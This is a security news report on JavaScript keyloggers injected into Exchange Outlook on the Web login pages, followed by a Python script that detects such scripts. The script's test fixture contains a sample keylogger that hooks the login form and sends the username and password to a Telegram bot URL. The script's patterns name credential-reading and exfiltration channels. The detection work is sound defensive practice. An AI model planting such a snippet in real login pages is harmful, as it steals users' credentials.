
Unknown threat actors have compromised Microsoft Exchange Servers accessible from the internet, injecting keylogging code into the Outlook on the Web (OWA) login pages used by government agencies and private companies worldwide.

Researchers from Positive Technologies revealed that these JavaScript-based keyloggers are designed to silently capture user login credentials and, in some cases, cookies. The stolen data is either stored on the compromised server or exfiltrated to Telegram or Discord, with markers identifying the victim organization.

The method used to initially access the servers remains uncertain. While some of the affected servers were found to be vulnerable to older known exploits such as ProxyLogon and ProxyShell, others showed no signs of such weaknesses, which suggests attackers may have used undisclosed vulnerabilities or alternative entry points. The attackers' focus appears widespread: compromised servers were located in countries across Asia, Europe, the Middle East, and Africa, targeting government bodies as well as the IT, industrial, and logistics sectors.

Although the keyloggers operate invisibly, their presence poses a serious risk to organizational security. Positive Technologies advises organizations to examine their Exchange login pages and authentication files for suspicious scripts, and inspect server directories for web shells or malicious pages. If a compromise is detected, immediate steps should include resetting user credentials, conducting a full investigation, and reviewing broader system access to mitigate further intrusion.
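The check recommended above, as an added triage script that is not part of the Positive Technologies research: it scans inline `<script>` blocks in logon pages for the combination of credential or cookie access with an exfiltration channel (Telegram, Discord, or any outbound request), and reports the file and line. The directory path, the file globs and the two sample pages are assumptions constructed for illustration, not real OWA markup.

```python
import re
from pathlib import Path

# Signals seen in JavaScript keyloggers injected into OWA logon pages; each one
# alone is weak (the real page also reads the username field), so they are combined.
INDICATORS = {
    "telegram_api": re.compile(r"api\.telegram\.org/bot", re.I),
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/webhooks", re.I),
    "reads_logon_fields": re.compile(r"getElementById\(\s*['\"](?:username|password)['\"]", re.I),
    "reads_cookies": re.compile(r"document\.cookie", re.I),
    "submit_hook": re.compile(r"addEventListener\(\s*['\"]submit['\"]", re.I),
    "outbound_request": re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon)\b", re.I),
}
EXFIL = {"telegram_api", "discord_webhook", "outbound_request"}
STEAL = {"reads_logon_fields", "reads_cookies", "submit_hook"}
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

def scan_page(html):
    """One finding per inline <script> that steals AND exfiltrates, or names Telegram/Discord."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        hits = {n for n, rx in INDICATORS.items() if rx.search(m.group(1))}
        if (hits & STEAL and hits & EXFIL) or hits & {"telegram_api", "discord_webhook"}:
            findings.append({"line": html.count("\n", 0, m.start()) + 1,
                             "indicators": sorted(hits)})
    return findings

def scan_directory(root, globs=("*.aspx", "*.js", "*.htm*")):
    """Walk an operator-supplied auth directory; return {file: findings} for files that trigger."""
    report = {}
    for pattern in globs:
        for path in Path(root).rglob(pattern):
            found = scan_page(path.read_text(errors="replace"))
            if found:
                report[str(path)] = found
    return report

# Constructed fixtures (not real OWA markup): a benign page and the same page
# with an appended credential-stealing script of the kind the report describes.
CLEAN_LOGON = """<html><body>
<form id="logonForm" method="post">
<input id="username" name="username"><input id="password" type="password">
</form>
<script>document.getElementById("username").focus();</script>
</body></html>"""
INJECTED_LOGON = CLEAN_LOGON.replace("</body>", """<script>
document.getElementById("logonForm").addEventListener("submit", function () {
  var c = document.getElementById("username").value + ":" + document.getElementById("password").value;
  fetch("https://api.telegram.org/bot<TOKEN>/sendMessage?text=ORG-TAG|" + encodeURIComponent(c));
});</script></body>""")
```

Run `scan_directory()` against a copy of the auth folder and compare any flagged file against a known-good build of the same Exchange version before acting; the heuristics are a starting point, not a signature.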
